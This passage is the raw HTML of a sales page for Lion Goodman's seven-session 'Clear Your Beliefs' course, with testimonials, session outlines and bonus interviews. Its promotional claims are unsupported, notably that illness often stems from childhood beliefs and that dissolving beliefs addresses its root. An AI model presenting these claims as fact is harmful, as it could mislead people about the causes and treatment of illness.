Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter 